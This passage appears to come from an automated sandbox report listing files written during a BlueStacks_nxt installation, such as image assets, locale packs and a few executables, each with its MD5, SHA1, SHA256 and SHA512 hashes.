SHA512 63f512559f2068a9702c7c527c126f6017cd8d1d16af52e41b884aa9a64ff4294a57243ec78c3a416f70fb6178a79877d68345357725ff92c935709a2ef8adde

C:\Program Files\BlueStacks_nxt\Assets\installer_logo.png

MD5 e33432b5d6dafb8b58f161cf38b8f177
SHA1 d7f520887ce1bfa0a1abd49c5a7b215c24cbbf6a
SHA256 9f3104493216c1fa114ff935d23e3e41c7c3511792a30b10a40b507936c0d183
SHA512 520dc99f3176117ebc28da5ef5439b132486ef67d02fa17f28b7eab0c59db0fa99566e44c0ca7bb75c9e7bd5244e4a23d87611a55c841c6f9c9776e457fb1cbf

C:\Program Files\BlueStacks_nxt\Assets\close_red.png

MD5 93216b2f9d66d423b3e1311c0573332d
SHA1 5efaebec5f20f91f164f80d1e36f98c9ddaff805
SHA256 d0b6d143642d356b40c47459a996131a344cade6bb86158f1b74693426b09bfb
SHA512 922a7292de627c5e637818556d25d9842a88e89f2b198885835925679500dfd44a1e25ce79e521e63c4f84a6b0bd6bf98e46143ad8cee80ecdbaf3d3bc0f3a32

C:\Program Files\BlueStacks_nxt\Assets\checked_gray_hover.png

MD5 ea22933e94c7ab813b639627f2b38286
SHA1 c5358c5cb7fb1a0744c775f8148c2376928fb509
SHA256 d7c79677d2ef897fa0ad1efc90e916c46da29f571208f78f24505603b7165c20
SHA512 ba447a1aedec49419e2b4a8de85c6047886f1a5ebb94f1c45e205a3780c6826f412a3892e97115b35e43839f43e346f3c72ffbf0c57d57f6d26b360ae61b3964

C:\Program Files\BlueStacks_nxt\Assets\checked_gray.png

MD5 ce144d2aab3bf213af693d4e18f87a59
SHA1 df59dc3dbba88bdc5ffc25f2e5e7b73ac3de5afa
SHA256 d8e502fab00b0c6f06ba6abede6922ab3b423fe6f2d2f56941dabc887b229ad3
SHA512 0f930edd485a0d49ef157f6cc8856609c087c91b77845adeb5cc8c8a80ebc7ec5416df351ffa1af780caad884dbb49dcc778b0b30de6fb7c85ffef22d7220ebe

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

MD5 6fd308ffdae08aaff91a54bd8aa3b348
SHA1 41adc7132ca7198090d1861b39a0829a28bf1449
SHA256 17c2d9983a75cd6888ccc27e3e73e3b0601c4e50e6a9d3655833bb8ef598423c
SHA512 31cb208d40730c0c63dc73ce65c64e2505e9f251b63d523fc818a4e3baacbb3f7b34d8c236d42e25df6b65ca537b91d9a5fc5fa6736fd74881e63bcb1cae6b47

C:\Program Files\BlueStacks_nxt\HD-ForceGPU.exe

MD5 fa146b05afa8f9a7e331f7f845c423a7
SHA1 f0f3b0d8603e3de88d2a258c2746f52291be8351
SHA256 2959f9c31a4b64c159611bb044195c11bf6b44e5be171b85ee3350a7fa40e33b
SHA512 b0118b3d312267fa54937553b08edc32e9e1c9692fa04573da06b92d9c6b08b09c87ca7e8fdb27275b66f07d355238230f8573364079fe1d2f7e9787efb2ebc3

C:\Program Files\BlueStacks_nxt\HD-GLCheck.exe

MD5 f47c0bbad441b60285e236b9811e9752
SHA1 2605282bfecca43d37904eed41aec2ab1d051a83
SHA256 6421a0f711de4a47042c10d5868136ca1531ad05d85f7f6dd51398cce3ee2659
SHA512 80b4954f72fbc4f2fa335eab89a1d878c3e893355a103ae9183ccb8cd3cc4125b73bbd69c0ff64973192e9b6ac289efe7f792ab2fb1305e402f39ad4f27ee7e9

C:\Program Files\BlueStacks_nxt\ProductLogo.ico

MD5 169706218f98a42594a8c5c5a65771fe
SHA1 b8ded94180212578d86a031eb71ef93dcffe1a26
SHA256 3803045963af064936d7071c178de8e40854968b3d3f9171c57a182c869f3697
SHA512 1c3f18ed0a24ffa78fe938826eb88531eb8be134d6f209b87d7af5d0e8c4829f01947d7b0048996b9755562bbb7f52e000bcd15d07d646cacb2989ac881ce448

C:\Windows\System32\storage.json

MD5 aa9ab927f7bc1bc84ada9519e58f9650
SHA1 a9515474d15f9cd43c4f1c30b2c7041d6c6b05c4
SHA256 3cb23b535845ddd6fd6160dbb5fb6b14096161d3e632e0dc424a788875c85094
SHA512 b5bb47ea20ec20587e29dd3b6f8f68e7f8ac567e087b1e432320c3264769ae5e03b16693f5c9d4ba38a0c67d2f2a071b3ee7d104e75cbfaa0aa9342515f0085c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 8e11150783971f1d4695d2c5f0c71ec6
SHA1 6b5e08dc8e788e73c54df382f81eae1ffac52ac9
SHA256 5a4ce6db33cc6892f047839008bf5f1f2fe737589a017a08f635061ad3311e08
SHA512 33909a1e71be07d822d9eb13261eae08220f069a65d4044c696411a524d4729b0c2600b220f8d9d6657a40102bac522cad889602582c4d9834463985fc19933c

C:\Program Files\BlueStacks_nxt\resources\icudtl.dat

MD5 03205e5952ea7b803839ecfe3bb000d6
SHA1 74146e76e31fd1e75ae1c34fa8194bc291b34a40
SHA256 8364e6c6bf5744357199de0de3f6ba30846ccda70288675b75059e6fd52241f3
SHA512 badb8843f9a483329cc4f559f95bd07a8cc1f9383e0e67dddacf74e586541067ca452a7fc28b63dcd28edc434c3be8ddc733dcbad0e06d973dafc99242f0b192

C:\Program Files\BlueStacks_nxt\resources\qtwebengine_resources.pak

MD5 aed2766cd70116ab1e0c430001a30b8f
SHA1 a06c62b35c333412dd61c493d6a6520a8c04537c
SHA256 4ed3a10f1bbc40b9a2ce3b8cb6dab6f00fe922d0c0e1c6ab5adfd8617cec9389
SHA512 a1ca058b88c1a6839b2e329b08423ee115800864f580f832bbc4f4720f0965984f893d210437951bd79dcfd3b917137b0b2e8f381e50d2a1bc2de37ca5555961

C:\Program Files\BlueStacks_nxt\resources\qtwebengine_resources_100p.pak

MD5 8615f18dea34c152e8aeb8f4e01fd17b
SHA1 032b7bab09943cc5c8a380b0aba29652d5539153
SHA256 e7e2cd13fa9fbaa33c537e8eecfd542e4ce4a621bc0b94159ef9e6e4541652a6
SHA512 2a68ba854d473883f20e1a26375fa39b689cd39d2e284a963b07f25fa3eb6865ff3d8fea2241af23ffc731b83e20ec5b8147486de0a507e83413f75d71eab248

C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\bg.pak

MD5 154217351d415b13dca71e28727902c4
SHA1 096a1640b5e83a7b20afdfa7cfe2507b4128e0a5
SHA256 da4bb8513745180a0eb26228a315786a6bfb98d6594173491d25cdf9d59c5bcf
SHA512 f1676a8b05c00588308c57b2290c00a6d844811e9ad4495ba94d62ae71a8c58d504ccd2697cfbf822fd5c2ce6423f76da8a901b4eae55095dc4b9667d9c2a8eb

C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\ca.pak

MD5 a2c61a98fe7407ded9ece126c4c9d057
SHA1 c7d64d8bdc2fd9e7f1c62dff79e0e56e13f9cd69
SHA256 4d583b753104ae98a1e5858bfe38dfa3195d477128441ca59c882d158d52ebf8
SHA512 7522ee10397140b5eb45ec3d5cb32e9212a7d3cae8fbc377b270872aaf6c7077e7b13465f6005a85b5fdd4d2e86b1731c3366ddfb2e4bccae4ae2d1a178e0b1c

C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\cs.pak

MD5 c0bb82986abc67281d8067e5f20625c7
SHA1 e7cc8888dd95d9edf226893f0e4c12e572bf6bf8
SHA256 217718dd6d64f45da33db0629e6d56da8084ae0fd8123eafda909e662a5e5b50
SHA512 80f4542345cc6e0d3589aeb76e0e5f19a824f2d3186d397c8fb71c1e9d6c056108df7f9a192a6515eb9ee43505b7844c0bf76b77596adcaa3c0ee783dd590ad9

C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\en-GB.pak

MD5 06da37b66f4dbbe8c5ae1bd7e4addc99
SHA1 ac190bbb14b76d14143dcc088f460d1be2ba2886
SHA256 60f87ec2b06329bdea7f835a61e9893fae147343f133caa2bfa5215797881ee0
SHA512 c436359e259c0a1cdc0dea1bb9ecd2bc22fe1124d76b9deac7e8c7751d97d66cbe61739aecef650908ed05363156fa11453490a9c9f23c74c683ac4e8c7c8c3e

C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\et.pak

MD5 73e6f20f0c75a9beb72798167f8c6f91
SHA1 d01932a69626d23e8ce9e9bc240f6d99dd155fb4
SHA256 ff1b0d50f6f067b291199578b6a7757797bd7fdc6b0ac472c9361076bf9eadaf
SHA512 98966566211bba402352607a0622dca7f64ad4c056cec2b40cb70572cd1ce5ed92556490b4399a32ed1c04a14d80a3841fd1a758225120ee416c68e9314316db

C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\es.pak

MD5 03265b1a7f6a996513067866d55f3bcb
SHA1 427eecd7810cf24c8758dc9beae18afc9d8969a0
SHA256 516234550bfda93687b28c5cb3b7b5362212bf41b900d790ade52747bcf766da
SHA512 d6ace0340666eaffe28f57fb070eb4504460bd47517cf3c0b9c07671a605ec017c4fb45a38fbb96b9c54887dcee639b41ef03b2fd85ed9a666af56dbb73023dc

C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\fi.pak

MD5 f55358f58eb17b4bc6abb19592c1aba7
SHA1 6dc1d99757bc5a447b9761a4a0c90a2be521c6b0
SHA256 cf3b9a857c63022d671f4cc335728c270935628f085ac9a17568a2529daeb4c1
SHA512 d7cb03ec31a3cd8c7f13e1bae1439fbba3b76636f1f254ba5376c5da82b9a98e93684fc3cab3bbe8a4c892ba42f17c0db1eec1531950e17932aee16007081aab

C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\fr.pak

MD5 75575474726cc8d98def90e0dbddcb0f
SHA1 3e62e3b73bab73597a01c3ece5871c64b142391f
SHA256 d37509844342371b4026b720dc00f77ff88fe2e7c2b27861e3ca66b10e76ca94
SHA512 37e8e5cc44ee4433b0206cd1baedb955947d0fdf172e69a28fb7bc09f2a57c4f27fb45c12a0a49753281cb2e2a92792b67d568f3cd4f90c9c87337249d031fc0

C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\fil.pak

MD5 f5257136ed900e1715979c9a96de292d
SHA1 217cbe02931f6466bdbdb27c85c876b851610b23
SHA256 98a20cd0e9fae36f22de4a4db7b515532b4327e6d475d4e39ae93ea45b76cd90
SHA512 c38828d2736ba26ad0bff9976adc9d3910df7a417aad8cf6e3cf6383688a56ad2581cbda520403d44b010562b56d6107211385fc80988ac57e930199415ca654

C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\he.pak

MD5 8c02d30c68c4abb4b1a7c2493d8fde51
SHA1 2cbe2f537d59971296f2180d146d9c2905d2a76f
SHA256 e37f0e2516799f320e4ac1a872d0ab7108c4f63d9ad33a17a4008923c7f93e9a
SHA512 9155cb07b6a23d7f73bf8f68af44ee3bc1e25c6ca643c2f8d64a808d3f78076e3ee60f68d3be9cfe3a6dcfbbfd4595e58c897cb4f8b92272e8ffb443cdf6f3a6

C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\kn.pak

MD5 2e9a1e91aa149308dde43e0b357e1c8a
SHA1 d657811a3b3dabe519fb7b5fad46977674234f51
SHA256 2a0411a1368fd5f342581b00fb3b451f89ad593fa49f0f79fd9abd5ee0d5f5e1
SHA512 d7b612562fb04a89dac28f51e691f42af39cf61bbd2199c4f652a3096330a99084c0f410bf0c449403031b9a264769ba2932cdae8b0c49bcf92b5ae7a4e8fe9b

C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\ms.pak

MD5 901240b9cb3a7a635c2d56d6ff1b3966
SHA1 c1fdd4ccf213bf1822696061d64930f47a017cdf
SHA256 a750d091e4ca00bdc647ca36c2a22cf9199126c69607fc14f468f6b3b588e55e
SHA512 2b316bc8d5f27f6f90434fa61d270a28f5aef2b9808b1467697c5671aedcfd99d7cf99d72f11d05dee06e73949ab2b22627ea1e925ce8b1ec65b4cd43d03eca4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 488aaa3520a6c3698e340deef948d248
SHA1 0146bd48e75a7c4462f2d281122aff20b993af6e
SHA256 cdf3bf040321d57dfa42d73afc009f36f6b6e573d814baca9e5e4af4e5809e30
SHA512 41a00f6de7d3ef7df3d0a38e7fbf40658aa6eed3ce61e1b4c4d33314d2962fd1e0522a1f63def7546463e4be1eeb322f11a91553eb825b4ed9593629f6727944

C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\sr.pak

MD5 97ef86fc3b66a0a3aa4e1be4555369f0
SHA1 bbe68527d0c4c9e6624920d548c0ab0c09dbac88
SHA256 d5a48e324fba0fe6ad0b08da12fa2f4b9279b6271d36710663b3462794a0c7fb
SHA512 fd7802060a8891df3ad2df1252e0fe09f227c7ca81715917fe0020277d28788326d9798cb62acb8820f4701fb18627f78b6d22d9ee8ee402abcfeb4704718ef3

C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\zh-TW.pak

MD5 c709c2e92d4c0a1a2fd30f5350bed636
SHA1 31c8463300bdfe0238f167451a1adffc4fa899a3
SHA256 37a8707ce5a07b4363579e2d411a1c641913ed1e0377ae1e8cdf70146cee889e
SHA512 38f8da72ecbf73f10a8109ba51f162e77b0f567f7415fe2fa17a2bd7677d9562ff8bd5c136251f44c192c7618cdf72684dfe11070f478255828a5bcc5df8c01d

F:\BlueStacks_nxt\Locales\i18n.zh-TW.txt

MD5 83cb955054b8fe7ae37386d91b22f685
SHA1 c89a0a41d22eec4761e9b57b0b2dde2d29d706d2
SHA256 d1e342b3a4a8f0d982e308f7c12103a402d636c5723e9c0ed810c5b25bce1814
SHA512 59547e6947f0f32c4cd5ac04f238180ae5d13232401ce73227bf5635e5a957e78fdbd4f9ccdc34358ee14ea0779834979fa4a523c5e3125aa2528e01c7b692b2

F:\BlueStacks_nxt\Locales\i18n.zh-CN.txt

MD5 7fe6e9ba41b3d6b43d03bff14964a93f
SHA1 c0b47f0ac6e920e32f969f4f6b07a649493dea5c
SHA256 203f2e9f9f72e575335f4d93101976f46b0361c06963dd414986a91678dbcc3c
SHA512 d72a11132c6098cd5bd2e06e7b9ee388e09b33b3ee1e56921e2ec6af7dc9b9ebac48c02802045b1f1899a0cbd5ab94512e52964324165de10d68163cfecf05bd

F:\BlueStacks_nxt\Locales\i18n.vi-VN.txt

MD5 a899623e80eaa446ffdebd64d5a8f7bc
SHA1 d5fc1c3e23e5fe11fa549dff385bcdca87c06a7e
SHA256 44a648a98709c846b9e3fee5b9ed6bb4a1c3b26a33ee9d9c6e589911063322c6
SHA512 e8c039bfdc876b54cca0c492d2c1e036c9c2a9597305b30ca07dadc85ebe4da5cb67effd2871c4ab4aaa2ec6d22cd6e3e54b771ec5daeee2c3e8eb9b9d666085

F:\BlueStacks_nxt\Locales\i18n.tr-TR.txt

MD5 2b5f2c757a4d42de2f98e31139b676b2
SHA1 cd40cc682b112f60c6dd460596cffb3b994bd882
SHA256 598ab5abf69d1de2c04e6e7fa807606f4a2924f966fa0c373fef99a474244487
SHA512 2055d884d2e39962801f1c69f997d58d6db5fe01784cb1202cbe72973a48f8bfc399642fd46d28dda9d56ef5558aab32b341d79ff7d0920af7f4769ffd986d08

F:\BlueStacks_nxt\Locales\i18n.th-TH.txt

MD5 c964784c1444bc7e9488acdec13990bc
SHA1 9ca7ac8a620fdb37aaf21fea1df37e388dab6eb1
SHA256 889ee3e31b027985b05bfd356470baf62a221617f37bdce444f2b60f7bb1f91e
SHA512 903f4554e0b2f602186837f39158a52bbb035d085cad49c03b8614219e22469eb63e9390e101c3312bcdca0751134accd37e0ed71d3db8eac096dff5a2b9e3d9

F:\BlueStacks_nxt\Locales\i18n.ru-RU.txt

MD5 5e617de676c07bb3ab766d5678df38a4
SHA1 cf69fc6e6c0b6d3a9a6bb6934b18752cb722b14f
SHA256 f07976072e28b0fbbf9bfbabe60f843874d2f72cb9ac76bf2980c1a8208a3793
SHA512 997178e8d5850b929d3f870036000021c17c3b28d73991dda7e0408b32186e328c08b1eff4ff76bc9d8567c07a1be0defd44fe0ab925d561a5c3b95386051009

F:\BlueStacks_nxt\Locales\i18n.pt-BR.txt

MD5 1a8e659bd29df24b5001a1f687e21be5
SHA1 f6c4b1cda1bad81f23a27014d3a77d4463afd6a5
SHA256 1b8232e35e0ac3a96f2ab402b5ff205f92b036174977b8a304f45491a67d5031
SHA512 19c5fbb3d827c5d590dde59f4f91c06e89db17c970f30e774ed68f353968930ba3db148fff2ade6e5357cc70d530458a64b9c40ee12e2baace3adaec527ef3be

F:\BlueStacks_nxt\Locales\i18n.pl-PL.txt

MD5 54f8558a0112610cc516958482672cf7
SHA1 3422b440364816c7e96d7f598e03df90b8ab74a3
SHA256 783d0131154663e7fa6b069b5ad5d3a86d94f4e97b5a58b88f71a1912bb9eae4
SHA512 23507a21e88574980f6de8905dcf6099346c5160356889675b318c575ceed9274d65574d882ae32936958f9f4810556a650467069e52a978efb03dd208ea2b3c

F:\BlueStacks_nxt\Locales\i18n.ko-KR.txt

MD5 f13198caa789feab1906e69736d1bf8e
SHA1 6087394d95723256c9eaa084cbbd03b800b8a7ad
SHA256 0a9b0ecd030084ad3f48791e991a9dc4d6bd78c1245db75ff7e48f33f8578986
SHA512 3b8e4f9b9395a2b512fa460845a5f4546971a31e1203d81c078955b5361888ad70176f143f50c9b963b0b4370c66ddfff3a7dbedb0a0d47ad881f8a6af44d2d4

F:\BlueStacks_nxt\Locales\i18n.ja-JP.txt

MD5 6977d12f436990c3f655c22bb44566af
SHA1 d0a04169354ab49104bc123e90494115dbd1539b
SHA256 c7b19642434a9e918003564b30cfbee5c0710463a74cb7fa86f9da2334d6d38c
SHA512 ff9ee652a79379cbdd7b2974fb6f61f4efaf2b73a79b28bf86b34288c42ccc343039110f5abd2c50ebe13f080e6f5eeb9196ba7eae3c61a782f6971d914a996d

F:\BlueStacks_nxt\Locales\i18n.it-IT.txt

MD5 fe2d985f41007a88d8f0fd8eab5d5d8d
SHA1 4d48113cc2284891828b4501367e780970334bcf
SHA256 41b9cc6ccdb90f6141eadee8f757cefe5f536d9660d777a4a77b597421bb144f
SHA512 6441405d76fed023a78c34a4752def7d242894cf05bc9e06bd795b106b6434c1893367af6bca73f77d6f737fd6eb9c687464cde18b609c2a3d82d2be07a270c0

F:\BlueStacks_nxt\Locales\i18n.id-ID.txt

MD5 f4875d3c5153bf3fbf73725c420c83dc
SHA1 56439c46ee459f4b456a5bac38f68a7355947194
SHA256 d6d18da6a56863a10458ddf94265525ba13ad4fbfa84a169ffaf7aca20a0370e
SHA512 792a66019f9f7180eafd63dcafa30109e7b89826fadae2b38d86cad35146fb8d53d3df2b02e9eae971d13cea37d7d9eb66a699366d95eb7abc235e577a356117

F:\BlueStacks_nxt\Locales\i18n.fr-FR.txt

MD5 3ba087f6afff180795610e8ac5bb5aaa
SHA1 f2d5c5f10694e51fed09d5b3a0397561beb331f9
SHA256 d2d2f4d6e554132fa86d0bfa0ac1892f10f53f30638599b17979cadb5d011f4c
SHA512 f9bbce232b486b51352f6c0386e515f0824b0b0ba56400e3f804f322b0a7e90e73b6917044bb8e0eb37509a0b4bdc1d37deeebae43547b9d8f35d2f34d5f55e5

F:\BlueStacks_nxt\Locales\i18n.es-ES.txt

MD5 67f8aef2c5208468ce113a47edfedb4c
SHA1 4d482c81f65dc7c7b23a6dd2cdaec0eb7fee69fa
SHA256 341df1d9ce68b161f1728bd466dd9da64d4723530f3bc0f7fa66a3dba3825917
SHA512 e3bd1e8b69fc28a257e9024bc0b783f161c6574e5f9aab9737c02a2c4b1ebca59cc761ecc9ef3c08e62a1f325072164899ae9c984f37bf385e05fc011255857d

F:\BlueStacks_nxt\Client\Assets\radio_selected_hover.png

MD5 47ff3e4cc15b8c4a07e3ceb6cb619b62
SHA1 0318e54c613b8ff00f54d843e90ef88310c1a96f
SHA256 4786cfb7c98edcf01d6b670abf19c50891d56a4de87b96a5e17be142b1af666a
SHA512 0212bd7f6cee390d3bc221a22189b75407fa660a0951c7f768645bf97e7b61ee86fa9b1de6f546ff1151560dcb3b071db8c14a7b08b0e771b539a817b31b154e

F:\BlueStacks_nxt\Client\Assets\radio_unselected_hover.png

MD5 22efccf38e15df945962ac85ac3aa3b7
SHA1 b94a8615dc92982e1637680446896080f97c2564
SHA256 0ec39ed4bf89a341f1b5aea56d0e99ff5c923b9c3a6a81adeb9ff21764136f92
SHA512 41a4dbb57abed1a16aa84c72c202da461ca45cbaf68f69a10cb3e5529e8dff659e89f7f4459d1e2e8f3549c6fd51f23fc8422f86667577ebed5ab5df149c79ee

F:\BlueStacks_nxt\Locales\i18n.en-US.txt

MD5 bc0bfbf0fa8b40c2f72957c2f57afb8f
SHA1 644765340a713413e159ff57f0098501ca8304f4
SHA256 819b673bc98a9aefa9e480b3df2a5f9558033fce38c2a2f5be08d10b9a859e28
SHA512 6e7e88ac28190011c1e1e2a78517e3bb858e35ac90f125882c64bfa26d5a6f7ee6718c558b9446f3aeead0a8fc53c825fca66ad2f6d82819ede19b88ff658e3f

F:\BlueStacks_nxt\Locales\i18n.de-DE.txt

MD5 995c4504c8e8e71b372e6d9b64b070f3
SHA1 9ff5eaec585c416446c3f7ad7f3985f42cdf6226
SHA256 c28bcb07bdf32e5221ce919354cab0349891dfcbb87540f241fb3f58cf9028b7
SHA512 f1fc68f8bcf923f4f682eb30ea980e6da36355eff9a8ad7eb93d558d96e831b19dbf167b2e6d2287c6532c2b2c5591c66191d1005ebb0d56eb1647904b804066

F:\BlueStacks_nxt\Locales\i18n.ar-IL.txt

MD5 9fb07e066cc2f213a64d35a97a8c2922
SHA1 a70db989f5c562bc69caad89a1402c8ad7c9b80e
SHA256 65e7b0f37b5e2aa805ac8d57969804d803430186f34e9703ca9fa09ba908ef90
SHA512 81680bff55b475a62a4bf29a8c219230b84894c1165f60e372209a5aacdba8e4819c3dfb76f3b55c15d472ababeabf0cd4b30c04e7daa26df63c8a5101970c3c

F:\BlueStacks_nxt\Locales\i18n.ar-EG.txt

MD5 2cbe2f0936384cc7729ca9b15e869955
SHA1 cbd351ef412b7fb52e2ac582f4eb58944020ee33
SHA256 057074129e8f390aa07851d6eb59e892440e7994c4c6f3b78618e7fb6f07ca92
SHA512 fb9e0fe5b138df8e36f334bcf7e4cc7c024d2d8828b63486c3ac19c8279e0e9e09d82d391b536eac0e52160992dc6bc3672523b5edb2cb63d7a96e4128b48b39

F:\BlueStacks_nxt\Client\Assets\exit_close_click.png

MD5 b09525b48c0023f893d6b64d06add4b1
SHA1 10ecd439ea04e02eefe17f6c110d0c0a78a1db21
SHA256 caa2a8fe9b282939a21b86f8f61fb0c9452222cc3409f06cbb0dcc45613aca8e
SHA512 c6f5a7014c24133eb576708ca17d15becf2b45ec278b3f94e5275e47c78cf0f2eb8bb1a17d277d1a665039f38f2e25faf830e275f426b0a94c6a3da096b6204f

C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\zh-CN.pak

MD5 54415acf2d54c65718c99ed78b4bf3e5
SHA1 311937480b01256a1e50d0556df9b4f9f9a46424
SHA256 3648945ec3205f590da62f76af957d8a4175890e6ddb5fd1103beeaf66728c7a
SHA512 4eba5d0f1be81e72699d8429252877096524b4e27fd7d8ac480ec13cb60a83f4b8288823299c1c4e210699278588662e578814b8061bd5b72b5179b956624fc9

C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\vi.pak

MD5 561050669f78bd04d0431de3eb98d160
SHA1 028a78bbaabe19ac338648ac95a8b944254e8d3d
SHA256 922eb514cc20dbb44f41745c9e793756f8b46892504207e75de188be0aca6333
SHA512 2df7ff472a616c9271da813a66c6bd98809d788c7dc752ff0f3f68423f245cadd6945a5424af740b17d14f4f6935a2f2bf030b369dc8a39fa6e968d7f2a1897d

C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\uk.pak

MD5 e21f45d7685b75be483013e1e8dc8237
SHA1 8f4cdd3dea580d7671117e9c49891212ab950686
SHA256 dd57df6e7b591b3bd6663743c52f4c5f3a7a24e90fd8045b03479707f25702b3
SHA512 b29d8c67a259e4221e9cbb082f41a1b008f665e18dac568c7ac75fd40ee1e1e00df8bcd65825fbac63d51b1bf555c5c3752b96a9c8a4a153cd325377a165a048

C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\tr.pak

MD5 1a505f3f30511c2b05eb29ee0e0bff26
SHA1 08d4002d32dc5ea8a9476495786f5d5c1bae7ea6
SHA256 27627a61c6857b80b5eec4f6720b585f82b38271b7470c00a444735beee254e0
SHA512 d925f59cc9af4d55ad5daee42094ddf5d120eae816cddb56e906cd8da47039502f7608e9c4af77994ee7db585697fb26dbbd1c2e7c0bee4e3b194c9eee80eeff

C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\th.pak

MD5 433dbeabe2d4c70255f1685ece8fb97b
SHA1 966c16c364b4f3ae6ccb8c5019c0b6bca75b593e
SHA256 dedb178d79730bb0282605f7bbc6e410b03ee7bdcee1a64c08d9e9c442f49942
SHA512 b5f3d434f71b62136647700e7d4c4e207bafeeb20cdb03019c6cd6580e61f88f596a4f2a0ca77b010f38b41a3eaf5df8e2a00e06764db17244083cb95703213c

C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\te.pak

MD5 079fbd6adf806504199dd0b05c87c697
SHA1 4fec8c3bae9b48f92e35b609fc3977eda5de2039
SHA256 ee2697e8850803f08bee80e461833bd9f4232532c3f569f56521b1320c99e5e2
SHA512 722c6f3f6f61a8eea6965eae290e580a3263b894e07f7aac08fb6cca67e668db92a874728e32764ee0c10f5307b753d1589b8cae5c8a39edb29c7253591c017d

C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\ta.pak

MD5 48554783d89587fe96d94cc1afb58248
SHA1 be0843e27225df82cbb27f017acb7bac27c92c5e
SHA256 df0d976ad84bd0dc165f341ca9c5dfe7995a4f676c1c0a09d7a4716747e94896
SHA512 2ec38646a550e86bd6634247de2a49be20e9f3c09820284da82f7aaa6ceabe32920c4395d3bcd728e3370f8342627a9a9f12b6a222de145213efe57239183784

C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\sw.pak

MD5 e99bc71c3caeae580ef7060155ddd0ff
SHA1 d6986e1fe1dd6c110b05f44f84e956ecac188b97
SHA256 4282f200af58345ac756dbf88d0b898d26750f5aa16b7d2557b4d31c0ec126c8
SHA512 6bef16c9633387a3a0557cb644f152210d75157ac9b8ab1af6b94bdbdfb48b2511d0adc84d269ad16a439415ec46b78ff9a2e743bf72238cc5f25a4ce5bbd7f0

C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\sv.pak

MD5 f2bf46d97477489d80659d0be53d9d05
SHA1 a76378ec45dcdef0c596aebe8a4cf36dd3f9c01c
SHA256 196265eea8a2d8746953564b11d64dfc38acc9b17d3e38965f3ae1ba78841e32
SHA512 d65d27d04beacb20d3367af016ef55bea774c782475271e0a0573d2bff2912835d96a803c216ca5f43b56d142e6a77b41a67f35c5bc704c10f5e2aee5d6b7348

C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\sl.pak

MD5 4138dc422fc6a5afb1a855ffe0caba32
SHA1 8b23cb3c91167908e181eb0ce9d730ca5b3179e7
SHA256 7904fb9153a65105690d76ebda6e9edef2852b868f6a8d2e989b2013d40ffc3b
SHA512 a578919421c6458fd187d5985d721257cfb7bc3404f174dff413c211f29cb2d4552699fe10f0c01a651e224c1c7f3189706aaf71107187120a4260214881e531

C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\sk.pak

MD5 b37b81799942fc174e05b6aac03ea4c3
SHA1 788d6d10c82614465628f79bbe1f2346839a582e
SHA256 579a167528badf2a6feafbab487bd2314dd6107d0cc87df17a88ae325ef16319
SHA512 31bb82eb4434665a1b22a21e3e91b48fb2fe78913aac18475f8f328f05fafb2e4bffdd1565b8f48c67061fbf760ad217300882b5871d1753255d969be2b49b44

C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\ru.pak

MD5 3d28ef9e25426b08409db5379cfd55e3
SHA1 25fefc87d6233da5b287dbbf04a63c34cb9c5571
SHA256 b81a0b0175225dbdf35150dcc0c36154cfc042c1525df216d68034f0ae609057
SHA512 210b8bf28519c1e1576dfaa76260ceb6fe5dc46d23a6c74f1eaba9e08abb310b34989f0e667b6839999f765cb9bb77d35636db63ba082d471c6b73819b357995

C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\ro.pak

MD5 14ee5c1a362e753a5c44b11343430fdb
SHA1 b87e4750d5319c5c695f1581feaacdd71abe0cda
SHA256 ac3134a201073f6482a4cceb29a745104325ac76b7ad0d262ac7567584f450a1
SHA512 ed647aa3f3ccd5033e41c8cbb8f85d1bd0dbf783472668abb9a7e83ce5ce05706b9d67d5cfb4c28791414e77b5ea9ca5335189545ee79475d3f7cf58c1f12377

C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\pt-PT.pak

MD5 0db54f0f25ec3a19dff541ba223bd5b4
SHA1 dc1f0c9b1c2578490af5923df179a92814c04904
SHA256 ff89da2b21c03475373f3839615c570d15b9929fa2cea991105915ef4e648d69
SHA512 96060c6c548085f019f3f127c4250ae6620c2b4f206da9203db94a7d2146c945b5384a661494ad886ceb35cf3f45500302b01009e08b43e549e17ddc318bc48c

C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\pt-BR.pak

MD5 4792f1e39c6875d8aa5e911f16ed638d
SHA1 c04ecb497096be4173f9aae3f0ae6accc8324156
SHA256 a39bf79dce50c0ef227c3f326728d12c7675a79ab5d4b891fc56913bcbe83e5e
SHA512 5fabf0e030f94c959eac797ae401f28b76ad63816e88d26e3875168978d7448317e3f86aa99b15c0ff266505c5dcb30124c796c6c46c0b90e09ce21b77324d69

C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\pl.pak

MD5 41ad390a8cc5fbd5b1f352e838b42ce1
